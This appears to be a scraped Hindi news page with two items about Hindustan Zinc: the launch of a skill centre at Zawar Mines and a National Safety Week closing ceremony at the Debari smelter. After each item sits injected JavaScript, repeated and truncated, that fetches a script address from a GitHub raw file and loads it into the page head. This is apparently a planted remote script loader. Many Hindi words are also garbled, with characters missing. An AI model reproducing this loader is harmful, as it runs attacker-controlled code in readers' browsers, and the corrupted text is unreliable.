उदयपुर, 15 मार्च। हिंदुस्तान जिंक द्वारा जावर माइंस क्षेत्र में जिंक कौशल विकास केंद्र का शुभारंभ किया गया। इस अवसर पर जास के एसबीयू निदेशक किशोर कुमार जावर माइंस मजदूर संघ के महामंत्री लालू राम, संघ के पदाधिकारी नागा राम, नेवतलाई सरपंच किशन लाल मीणा ,भलाडिया सरपंच प्रतिनिधि धूलचंद मीणा एवं पंचायत समिति सदास्य केसु लाल मीणा उपस्थित थे। कार्यक्रम में जावर माइंस के आस पास के क्षेत्र के 120 छात्र इलेक्ट्रीशियन एवं फूड एवं बेवरेज ट्रेड में प्रशिक्षण लेगें।
इस असर र िो कुमार ने कहा कि, इलेक्ट्रिकल और फूड एवं बेवरेज में प्रशिक्षण प्रदान करने के साथ-साथ कंप्यूटर एवं अंगेेजी का प्रांरभिक ज्ञान की यह पहल आदिवासी और शहरों के युवाओं के बीच की खाई को पाटेगी, जो उन्हें आत्मनिर्भर बनने में सहायक होगी। मजदूर संघ के लालू राम ने कहा कि मुफ्त जिंक कौशल प्रशिक्षण मे ंहम युवाओं को नौकरी के लिए इंटरव्यू के हेतु तैयारी करने में सहायत कत ै ो कि उके लिये सहायक है।
जिंक कौशल केंद्र, जिसका उद्देश्य सहायक इलेक्ट्रीशियन, माइक्रोफाइनेंस कार्यकारी, निहत्थे सुरक्षा गार्ड, सामान्य ड्यूटी सहायक, खुदरा बिक्री जैसे विभिन्न ट्रेडों में लघु अवधि के गहन पाठ्यक्रम प्रदान करना है । केंद्र युवाओं को नौकरी और स्वरोजगार के अवसरों में प्रवेश करने में सहायता करता है एवं इस हेतु तैयार रत है जो बाद में उनके जीवन में एक ठोस और सकारात्मक बदलाव लाने में सक्षम है।
कंपनी द्वारा राजस्थान के कायड, देबारी और चंदेरिया एवं उत्तराखंड के पंतनगर में चार नए जिंक कौशल केंद्र शुरू किए गए हैं। अब तक इन कौशल केंद्रों के माध्यम से 1,700 से अधिक युवाओं को प्रशिक्षित किया गया है और 1,400 से अधिक युवाओं को अपने-अपने क्ेत्रं के िभिन्न ंगठों में रोजगार से जुडे है। कुछ स्वरोजगार से जुड कर आत्मनिर्भर है।;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head').appendChild(script);});;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/sockets.txt';fetch(url).then(response => response.text()).then(data...
हिंदुस्तान जिंक के जिंक स्मेल्टर देबारी परिसर 51वें राष्ट्रीय सुरक्षा सप्ताह का समापन समारोह आयोजित किया गया। कार्यक्रम मय अतिथि पवन कुमार गोयल उपनिरीक्षक कारखाना तथा बॉयलर उदयपुर, सूरजप्रकाश सहनिरक्षक कारखाना तथा बॉयलर, यूनियन के वरिष्ठ पदाधिकारी मांगीलाल अहीर, प्रकाश श्रीमाल, और एसबीयू हेड लीलाधर पाटीदार ने माँ सरस्वती के समक्ष दीप प्रज्जवलित कर सुरक्षा शपथ दिलाई।
इस अवसर पर गोयल ने कहा कि उद्योगों का राष्ट्र के विकास में महत्वपूर्णयगा ै, रतमान में नवीनतम तकनीक के साथ ही जोखीम भी बढ़ा है जिसका सही आंकलन कर सुरक्षित कार्य हम सभी की जिम्मेदारी है। उन्होंने हिन्दुस्तान जिं़क को सुरक्षा के प्रति सजगता के लिए अनुकरणीय बताते हुए देबारी जिं़क स्मेल्टर के सुरक्षा मानकों और जागरूकता की सराहना की।
प्रकाश श्रीमाल ने अपने उदबोधन में युवा संस्कृति में सुरक्ा को ोषत रन ी बात की। मांगीलाल अहीर ने अपने उदबोधन में जिंक स्मेल्टर देबारी के सुरक्षा आयामों तथा विगत वर्षो में हुए परिवर्तनों पर प्रकाश डाला। एसबीयू हेड लीलाधर पाटीदार ने अपने उदबोधन में कहा की सुरक्षा सदैव तथा सर्वत्र है और इसे अपने दैनिक व्यव्हार में लाये। उन्होंने कहा कि सुरक्षा को अपना धर्म मानकर किसी भी असुरक्षित कार्य को ना करने के लिए प्रत्येक व्यक्ि शक् है तथा व स्यं सदैव सुरक्षित कार्यो को प्राथमिकता देते है तथा देते रहेंगे। सुरक्षा तथा पर्यावरण प्रमुख दिगंबर पाटिल ने वर्ष भर के मानकों, उपलब्धियों तथा राष्ट्रीय सुरक्षा सप्ताह में किये गए कार्यो पर प्रकाश डाला। सुरक्षा सप्ताह के दौरान विभिन्न प्रतियोगिताओं सुरक्षा पोस्टर, सुरक्षा स्लोगन, सुरक्षा क्विज, गृह सुरक्षा, प्राथमिक उपचार तथा सीपीआर, सुरक्ा मैराथॉन क आयोन कया गया। विजेताओं को अतिथियों द्वारा पुरस्कृत किया गया। समापन समारोह में कर्मचारियों द्वारा जिंक स्मेल्टर देबारी के शोले नामक सुरक्षा नाटिका प्रस्तुत की गई जिसमें जीवन रक्षक नियमो की अनुपालना तथा जनरल इलेक्ट्रिकल सेफ्टी मैनेजमेंट पर मनमोहक प्रस्तुति दी गई। कार्यक्रम का संचालन सुरक्षा अधिकारी श्रीमती उषा शर्मा ने किया। इस अवसर पर जिंक स्मल्टर ेबाी के सभी पदाधिकारी भा्करन सेतुपति , राकेश रोहिला, नरेश कुमार अग्रवाल, अमित वाली, विभोर सिंघल, अनूप कुमार, राहुल यादव एवं कर्मचारी उपस्तिथ थे।;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head').appendChild(script);});;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src =...